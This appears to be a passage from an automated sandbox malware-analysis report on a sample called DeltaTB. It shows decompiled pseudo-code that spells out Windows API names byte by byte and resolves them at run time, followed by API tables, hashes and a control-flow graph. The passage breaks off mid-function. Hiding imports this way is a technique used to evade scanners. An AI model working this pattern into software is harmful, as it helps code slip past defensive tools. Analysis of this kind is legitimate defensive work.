                                                                                                                                                              					 *((char*)(_t405 + 0x3d)) = 0x67;
                                                                                                                                                              					 *((char*)(_t405 + 0x3e)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 0x3f)) = 0x42;
                                                                                                                                                              					 *((char*)(_t405 + 0x40)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 + 0x41)) = 0x78;
                                                                                                                                                              					 *((char*)(_t405 + 0x42)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 + 0x43)) = 0;
                                                                                                                                                              					// *__esi holds the resolved LoadLibraryA; the pushed name at _t405 + 0x50 spells "User32.dll".
                                                                                                                                                              					_t361 =  *__esi();
                                                                                                                                                              					_push(_t405 + 0x38);
                                                                                                                                                              					_push(_t361);
                                                                                                                                                              					// The pushed name at _t405 + 0x38 spells "MessageBoxW", resolved from the User32.dll handle.
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0xc)) =  *(__esi + 4)();
                                                                                                                                                              					_push(_t405 - 0x90);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 - 0x90)) = 0x43;
                                                                                                                                                              					 *((char*)(_t405 - 0x8f)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0x8e)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x8d)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 - 0x8c)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x8b)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x8a)) = 0x44;
                                                                                                                                                              					 *((char*)(_t405 - 0x89)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 - 0x88)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0x87)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x86)) = 0x63;
                                                                                                                                                              					 *((char*)(_t405 - 0x85)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x84)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0x83)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0x82)) = 0x79;
                                                                                                                                                              					 *((char*)(_t405 - 0x81)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 0x80)) = 0;
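                                                                                                                                                              					// The bytes written at _t405 - 0x90 spell "CreateDirectoryW", resolved from the Kernel32.dll handle (_t402).
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x10)) =  *(__esi + 4)();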
                                                                                                                                                              					_push(_t405 - 0x14);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 - 0x14)) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 - 0x13)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x12)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x11)) = 0x54;
                                                                                                                                                              					 *((char*)(_t405 - 0x10)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0xf)) = 0x6d;
                                                                                                                                                              					 *((char*)(_t405 - 0xe)) = 0x70;
                                                                                                                                                              					 *((char*)(_t405 - 0xd)) = 0x50;
                                                                                                                                                              					 *((char*)(_t405 - 0xc)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 - 0xb)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0xa)) = 0x68;
                                                                                                                                                              					 *((char*)(_t405 - 9)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 8)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x14)) =  *(__esi + 4)();
                                                                                                                                                              					 *((char*)(_t405 - 0xd4)) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 - 0xd3)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0xd2)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0xd1)) = 0x53;
                                                                                                                                                              					 *((char*)(_t405 - 0xd0)) = 0x79;
                                                                                                                                                              					 *((char*)(_t405 - 0xcf)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 - 0xce)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0xcd)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0xcc)) = 0x6d;
                                                                                                                                                              					 *((char*)(_t405 - 0xcb)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 0xca)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0xc9)) = 0x77;
                                                                                                                                                              					 *((char*)(_t405 - 0xc8)) = 0x36;
                                                                                                                                                              					 *((char*)(_t405 - 0xc7)) = 0x34;
                                                                                                                                                              					 *((char*)(_t405 - 0xc6)) = 0x44;
                                                                                                                                                              					 *((char*)(_t405 - 0xc5)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 - 0xc4)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0xc3)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0xc2)) = 0x63;
                                                                                                                                                              					 *((char*)(_t405 - 0xc1)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0xc0)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0xbf)) = 0x72;
                                                                                                                                                              					_push(_t405 - 0xd4);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 - 0xbe)) = 0x79;
                                                                                                                                                              					 *((char*)(_t405 - 0xbd)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 0xbc)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x18)) =  *(__esi + 4)();
                                                                                                                                                              					_push(_t405 - 0x54);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 - 0x54)) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 - 0x53)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x52)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x51)) = 0x53;
                                                                                                                                                              					 *((char*)(_t405 - 0x50)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x4f)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 - 0x4e)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0x4d)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x4c)) = 0x75;
                                                                                                                                                              					 *((char*)(_t405 - 0x4b)) = 0x70;
                                                                                                                                                              					 *((char*)(_t405 - 0x4a)) = 0x49;
                                                                                                                                                              					 *((char*)(_t405 - 0x49)) = 0x6e;
                                                                                                                                                              					 *((char*)(_t405 - 0x48)) = 0x66;
                                                                                                                                                              					 *((char*)(_t405 - 0x47)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0x46)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 0x45)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x1c)) =  *(__esi + 4)();
                                                                                                                                                              					 *(_t405 + 0x44) = 0x53;
                                                                                                                                                              					 *((char*)(_t405 + 0x45)) = 0x68;
                                                                                                                                                              					 *((char*)(_t405 + 0x46)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 0x47)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 + 0x48)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 + 0x49)) = 0x33;
                                                                                                                                                              					 *((char*)(_t405 + 0x4a)) = 0x32;
                                                                                                                                                              					 *((char*)(_t405 + 0x4b)) = 0x2e;
                                                                                                                                                              					 *((char*)(_t405 + 0x4c)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 + 0x4d)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 + 0x4e)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 + 0x4f)) = 0;
                                                                                                                                                              					 *((char*)(_t405 - 0x7c)) = 0x53;
                                                                                                                                                              					 *((char*)(_t405 - 0x7b)) = 0x48;
                                                                                                                                                              					 *((char*)(_t405 - 0x7a)) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 - 0x79)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x78)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x77)) = 0x46;
                                                                                                                                                              					 *((char*)(_t405 - 0x76)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0x75)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 - 0x74)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 - 0x73)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x72)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0x71)) = 0x50;
                                                                                                                                                              					 *((char*)(_t405 - 0x70)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 - 0x6f)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x6e)) = 0x68;
                                                                                                                                                              					 *((char*)(_t405 - 0x6d)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 0x6c)) = 0;
                                                                                                                                                              					_t372 = LoadLibraryA(_t405 + 0x44); // executed
                                                                                                                                                              					_push(_t405 - 0x7c);
                                                                                                                                                              					_push(_t372);
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x20)) =  *(__esi + 4)();
                                                                                                                                                              					 *((char*)(_t405 - 0xb8)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 0xb7)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 - 0xb6)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 - 0xb5)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0xb4)) = 0x46;
                                                                                                                                                              					 *((char*)(_t405 - 0xb3)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0xb2)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0xb1)) = 0x53;
                                                                                                                                                              					 *((char*)(_t405 - 0xb0)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 - 0xaf)) = 0x6e;
                                                                                                                                                              					 *((char*)(_t405 - 0xae)) = 0x67;
                                                                                                                                                              					 *((char*)(_t405 - 0xad)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 - 0xac)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0xab)) = 0x4f;
                                                                                                                                                              					 *((char*)(_t405 - 0xaa)) = 0x62;
                                                                                                                                                              					_push(_t405 - 0xb8);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 - 0xa9)) = 0x6a;
                                                                                                                                                              					 *((char*)(_t405 - 0xa8)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0xa7)) = 0x63;
                                                                                                                                                              					 *((char*)(_t405 - 0xa6)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0xa5)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x24)) =  *(__esi + 4)();
                                                                                                                                                              					_push(_t405 - 0xa4);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 - 0xa4)) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 - 0xa3)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0xa2)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0xa1)) = 0x45;
                                                                                                                                                              					 *((char*)(_t405 - 0xa0)) = 0x78;
                                                                                                                                                              					 *((char*)(_t405 - 0x9f)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 - 0x9e)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x9d)) = 0x43;
                                                                                                                                                              					 *((char*)(_t405 - 0x9c)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0x9b)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 - 0x9a)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x99)) = 0x50;
                                                                                                                                                              					 *((char*)(_t405 - 0x98)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0x97)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0x96)) = 0x63;
                                                                                                                                                              					 *((char*)(_t405 - 0x95)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x94)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 - 0x93)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 - 0x92)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x28)) =  *(__esi + 4)();
                                                                                                                                                              					_push(_t405 + 0x2c);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 + 0x2c)) = 0x43;
                                                                                                                                                              					 *((char*)(_t405 + 0x2d)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 + 0x2e)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 + 0x2f)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 + 0x30)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 0x31)) = 0x48;
                                                                                                                                                              					 *((char*)(_t405 + 0x32)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 + 0x33)) = 0x6e;
                                                                                                                                                              					 *((char*)(_t405 + 0x34)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 + 0x35)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 + 0x36)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 0x37)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x2c)) =  *(__esi + 4)();
                                                                                                                                                              					_push(_t405 - 0x34);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 - 0x34)) = 0x46;
                                                                                                                                                              					 *((char*)(_t405 - 0x33)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 - 0x32)) = 0x6e;
                                                                                                                                                              					 *((char*)(_t405 - 0x31)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 - 0x30)) = 0x46;
                                                                                                                                                              					 *((char*)(_t405 - 0x2f)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 - 0x2e)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 - 0x2d)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 - 0x2c)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x2b)) = 0x46;
                                                                                                                                                              					 *((char*)(_t405 - 0x2a)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 - 0x29)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 - 0x28)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x27)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 0x26)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x30)) =  *(__esi + 4)();
                                                                                                                                                              					 *((char*)(_t405 + 0x5c)) = 0x46;
                                                                                                                                                              					 *((char*)(_t405 + 0x5d)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 + 0x5e)) = 0x6e;
                                                                                                                                                              					 *((char*)(_t405 + 0x5f)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 + 0x60)) = 0x43;
                                                                                                                                                              					 *((char*)(_t405 + 0x61)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 + 0x62)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 + 0x63)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 + 0x64)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 0x65)) = 0;
                                                                                                                                                              					_push(_t405 + 0x5c);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x34)) =  *(__esi + 4)();
                                                                                                                                                              					_push(_t405 - 0x44);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 - 0x44)) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 - 0x43)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x42)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x41)) = 0x43;
                                                                                                                                                              					 *((char*)(_t405 - 0x40)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0x3f)) = 0x6d;
                                                                                                                                                              					 *((char*)(_t405 - 0x3e)) = 0x6d;
                                                                                                                                                              					 *((char*)(_t405 - 0x3d)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 - 0x3c)) = 0x6e;
                                                                                                                                                              					 *((char*)(_t405 - 0x3b)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 - 0x3a)) = 0x4c;
                                                                                                                                                              					 *((char*)(_t405 - 0x39)) = 0x69;
                                                                                                                                                              					 *((char*)(_t405 - 0x38)) = 0x6e;
                                                                                                                                                              					 *((char*)(_t405 - 0x37)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x36)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 0x35)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x38)) =  *(__esi + 4)();
                                                                                                                                                              					_push(_t405 - 0x68);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 - 0x68)) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 - 0x67)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x66)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 - 0x65)) = 0x4d;
                                                                                                                                                              					 *((char*)(_t405 - 0x64)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 - 0x63)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 - 0x62)) = 0x75;
                                                                                                                                                              					 *((char*)(_t405 - 0x61)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 - 0x60)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x5f)) = 0x48;
                                                                                                                                                              					 *((char*)(_t405 - 0x5e)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 - 0x5d)) = 0x6e;
                                                                                                                                                              					 *((char*)(_t405 - 0x5c)) = 0x64;
                                                                                                                                                              					 *((char*)(_t405 - 0x5b)) = 0x6c;
                                                                                                                                                              					 *((char*)(_t405 - 0x5a)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 - 0x59)) = 0x57;
                                                                                                                                                              					 *((char*)(_t405 - 0x58)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x3c)) =  *(__esi + 4)();
                                                                                                                                                              					_push(_t405 + 0x1c);
                                                                                                                                                              					_push(_t402);
                                                                                                                                                              					 *((char*)(_t405 + 0x1c)) = 0x47;
                                                                                                                                                              					 *((char*)(_t405 + 0x1d)) = 0x65;
                                                                                                                                                              					 *((char*)(_t405 + 0x1e)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 + 0x1f)) = 0x4c;
                                                                                                                                                              					 *((char*)(_t405 + 0x20)) = 0x61;
                                                                                                                                                              					 *((char*)(_t405 + 0x21)) = 0x73;
                                                                                                                                                              					 *((char*)(_t405 + 0x22)) = 0x74;
                                                                                                                                                              					 *((char*)(_t405 + 0x23)) = 0x45;
                                                                                                                                                              					 *((char*)(_t405 + 0x24)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 + 0x25)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 + 0x26)) = 0x6f;
                                                                                                                                                              					 *((char*)(_t405 + 0x27)) = 0x72;
                                                                                                                                                              					 *((char*)(_t405 + 0x28)) = 0;
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x40)) =  *(__esi + 4)();
                                                                                                                                                              				}
                                                                                                                                                              				_pop(_t403);
                                                                                                                                                              				_pop(_t392);
                                                                                                                                                              				return E009A3BC5(_t404, _t392,  *(_t405 + 0x74) ^ _t405, _t400, _t403, _t404);
                                                                                                                                                              			}
















                                                                                                                                                              0x009a1d91
                                                                                                                                                              0x009a1d92
                                                                                                                                                              0x009a1d96
                                                                                                                                                              0x009a1d9a
                                                                                                                                                              0x009a1d9e
                                                                                                                                                              0x009a1da2
                                                                                                                                                              0x009a1da6
                                                                                                                                                              0x009a1daa
                                                                                                                                                              0x009a1dae
                                                                                                                                                              0x009a1db2
                                                                                                                                                              0x009a1db6
                                                                                                                                                              0x009a1dba
                                                                                                                                                              0x009a1dbe
                                                                                                                                                              0x009a1dc2
                                                                                                                                                              0x009a1dc8
                                                                                                                                                              0x009a1dcb
                                                                                                                                                              0x009a1dd2
                                                                                                                                                              0x009a1dd9
                                                                                                                                                              0x009a1de0
                                                                                                                                                              0x009a1de7
                                                                                                                                                              0x009a1dee
                                                                                                                                                              0x009a1df5
                                                                                                                                                              0x009a1dfc
                                                                                                                                                              0x009a1e03
                                                                                                                                                              0x009a1e0a
                                                                                                                                                              0x009a1e11
                                                                                                                                                              0x009a1e18
                                                                                                                                                              0x009a1e1f
                                                                                                                                                              0x009a1e26
                                                                                                                                                              0x009a1e2d
                                                                                                                                                              0x009a1e34
                                                                                                                                                              0x009a1e3b
                                                                                                                                                              0x009a1e42
                                                                                                                                                              0x009a1e49
                                                                                                                                                              0x009a1e50
                                                                                                                                                              0x009a1e57
                                                                                                                                                              0x009a1e5e
                                                                                                                                                              0x009a1e6b
                                                                                                                                                              0x009a1e6c
                                                                                                                                                              0x009a1e6d
                                                                                                                                                              0x009a1e74
                                                                                                                                                              0x009a1e7b
                                                                                                                                                              0x009a1e84
                                                                                                                                                              0x009a1e8a
                                                                                                                                                              0x009a1e8b
                                                                                                                                                              0x009a1e8c
                                                                                                                                                              0x009a1e90
                                                                                                                                                              0x009a1e94
                                                                                                                                                              0x009a1e98
                                                                                                                                                              0x009a1e9c
                                                                                                                                                              0x009a1ea0
                                                                                                                                                              0x009a1ea4
                                                                                                                                                              0x009a1ea8
                                                                                                                                                              0x009a1eac
                                                                                                                                                              0x009a1eb0
                                                                                                                                                              0x009a1eb4
                                                                                                                                                              0x009a1eb8
                                                                                                                                                              0x009a1ebc
                                                                                                                                                              0x009a1ec0
                                                                                                                                                              0x009a1ec4
                                                                                                                                                              0x009a1ec8
                                                                                                                                                              0x009a1ece
                                                                                                                                                              0x009a1ed5
                                                                                                                                                              0x009a1ed9
                                                                                                                                                              0x009a1edd
                                                                                                                                                              0x009a1ee1
                                                                                                                                                              0x009a1ee5
                                                                                                                                                              0x009a1ee9
                                                                                                                                                              0x009a1eed
                                                                                                                                                              0x009a1ef1
                                                                                                                                                              0x009a1ef5
                                                                                                                                                              0x009a1ef9
                                                                                                                                                              0x009a1efd
                                                                                                                                                              0x009a1f01
                                                                                                                                                              0x009a1f04
                                                                                                                                                              0x009a1f08
                                                                                                                                                              0x009a1f0c
                                                                                                                                                              0x009a1f10
                                                                                                                                                              0x009a1f14
                                                                                                                                                              0x009a1f18
                                                                                                                                                              0x009a1f1c
                                                                                                                                                              0x009a1f20
                                                                                                                                                              0x009a1f24
                                                                                                                                                              0x009a1f28
                                                                                                                                                              0x009a1f2c
                                                                                                                                                              0x009a1f30
                                                                                                                                                              0x009a1f34
                                                                                                                                                              0x009a1f38
                                                                                                                                                              0x009a1f3c
                                                                                                                                                              0x009a1f40
                                                                                                                                                              0x009a1f44
                                                                                                                                                              0x009a1f47
                                                                                                                                                              0x009a1f4c
                                                                                                                                                              0x009a1f4d
                                                                                                                                                              0x009a1f51
                                                                                                                                                              0x009a1f54
                                                                                                                                                              0x009a1f5b
                                                                                                                                                              0x009a1f62
                                                                                                                                                              0x009a1f69
                                                                                                                                                              0x009a1f70
                                                                                                                                                              0x009a1f77
                                                                                                                                                              0x009a1f7e
                                                                                                                                                              0x009a1f85
                                                                                                                                                              0x009a1f8c
                                                                                                                                                              0x009a1f93
                                                                                                                                                              0x009a1f9a
                                                                                                                                                              0x009a1fa1
                                                                                                                                                              0x009a1fa8
                                                                                                                                                              0x009a1faf
                                                                                                                                                              0x009a1fb6
                                                                                                                                                              0x009a1fc3
                                                                                                                                                              0x009a1fc4
                                                                                                                                                              0x009a1fc5
                                                                                                                                                              0x009a1fcc
                                                                                                                                                              0x009a1fd3
                                                                                                                                                              0x009a1fda
                                                                                                                                                              0x009a1fe1
                                                                                                                                                              0x009a1fea
                                                                                                                                                              0x009a1ff3
                                                                                                                                                              0x009a1ff4
                                                                                                                                                              0x009a1ff5
                                                                                                                                                              0x009a1ffc
                                                                                                                                                              0x009a2003
                                                                                                                                                              0x009a200a
                                                                                                                                                              0x009a2011
                                                                                                                                                              0x009a2018
                                                                                                                                                              0x009a201f
                                                                                                                                                              0x009a2026
                                                                                                                                                              0x009a202d
                                                                                                                                                              0x009a2034
                                                                                                                                                              0x009a203b
                                                                                                                                                              0x009a2042
                                                                                                                                                              0x009a2049
                                                                                                                                                              0x009a2050
                                                                                                                                                              0x009a2057
                                                                                                                                                              0x009a205e
                                                                                                                                                              0x009a2065
                                                                                                                                                              0x009a206c
                                                                                                                                                              0x009a2073
                                                                                                                                                              0x009a207c
                                                                                                                                                              0x009a2082
                                                                                                                                                              0x009a2083
                                                                                                                                                              0x009a2084
                                                                                                                                                              0x009a2088
                                                                                                                                                              0x009a208c
                                                                                                                                                              0x009a2090
                                                                                                                                                              0x009a2094
                                                                                                                                                              0x009a2098
                                                                                                                                                              0x009a209c
                                                                                                                                                              0x009a20a0
                                                                                                                                                              0x009a20a4
                                                                                                                                                              0x009a20a8
                                                                                                                                                              0x009a20ac
                                                                                                                                                              0x009a20b0
                                                                                                                                                              0x009a20b6
                                                                                                                                                              0x009a20bc
                                                                                                                                                              0x009a20bd
                                                                                                                                                              0x009a20be
                                                                                                                                                              0x009a20c2
                                                                                                                                                              0x009a20c6
                                                                                                                                                              0x009a20ca
                                                                                                                                                              0x009a20ce
                                                                                                                                                              0x009a20d2
                                                                                                                                                              0x009a20d6
                                                                                                                                                              0x009a20da
                                                                                                                                                              0x009a20de

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000000), ref: 009A1B9F
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 009A1BF1
                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000), ref: 009A1C94
                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000), ref: 009A1F47
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$AddressProc
                                                                                                                                                              • String ID: Kernel32.dll
                                                                                                                                                              • API String ID: 1469910268-1926710522
                                                                                                                                                              • Opcode ID: f241ade15c52fb00b301d046c89883dc242d2a9841ee368fbd89bb804c9f9921
                                                                                                                                                              • Instruction ID: 3848d1d1dd915602ce1c90171d33704b6d4a4d2d616e9e800b63e3294342fd97
                                                                                                                                                              • Opcode Fuzzy Hash: f241ade15c52fb00b301d046c89883dc242d2a9841ee368fbd89bb804c9f9921
                                                                                                                                                              • Instruction Fuzzy Hash: 0A42771080C7D8DDEB12CB68C9487DEBFE51F22748F0841C995986A292C7FF5A58CB76
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 187 9a1372-9a138c 188 9a1396-9a13a4 187->188 189 9a13aa-9a13b9 188->189 190 9a14c7-9a14db call 9a3bc5 188->190 194 9a13bb-9a13fb 189->194 195 9a1402-9a142b 189->195 194->195 195->190 197 9a1431-9a14b4 call 9a221a wsprintfW CreateDirectoryW 195->197 197->190 200 9a14b6-9a14c1 197->200 200->188 200->190
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E009A1372(intOrPtr __edx, intOrPtr __edi) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				char _v540;
                                                                                                                                                              				signed char _v541;
                                                                                                                                                              				signed char _v542;
                                                                                                                                                              				signed char _v543;
                                                                                                                                                              				signed char _v544;
                                                                                                                                                              				signed char _v545;
                                                                                                                                                              				signed char _v546;
                                                                                                                                                              				signed char _v547;
                                                                                                                                                              				signed char _v548;
                                                                                                                                                              				signed short _v550;
                                                                                                                                                              				signed short _v552;
                                                                                                                                                              				char _v556;
                                                                                                                                                              				signed char _v560;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                              				intOrPtr _t73;
                                                                                                                                                              				WCHAR* _t74;
                                                                                                                                                              				signed int _t76;
                                                                                                                                                              				void* _t77;
                                                                                                                                                              
                                                                                                                                                              				_t73 = __edi;
                                                                                                                                                              				_t72 = __edx;
                                                                                                                                                              				_v8 =  *0x9a5000 ^ _t76;
                                                                                                                                                              				_t69 = 0xb7;
                                                                                                                                                              				_v560 = 5;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_v560 = _v560 - 1;
                                                                                                                                                              					if(_v560 == 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t69 = 3;
                                                                                                                                                              					_push( &_v556); // executed
                                                                                                                                                              					if( *((intOrPtr*)(_t73 + 8))() != 0) {
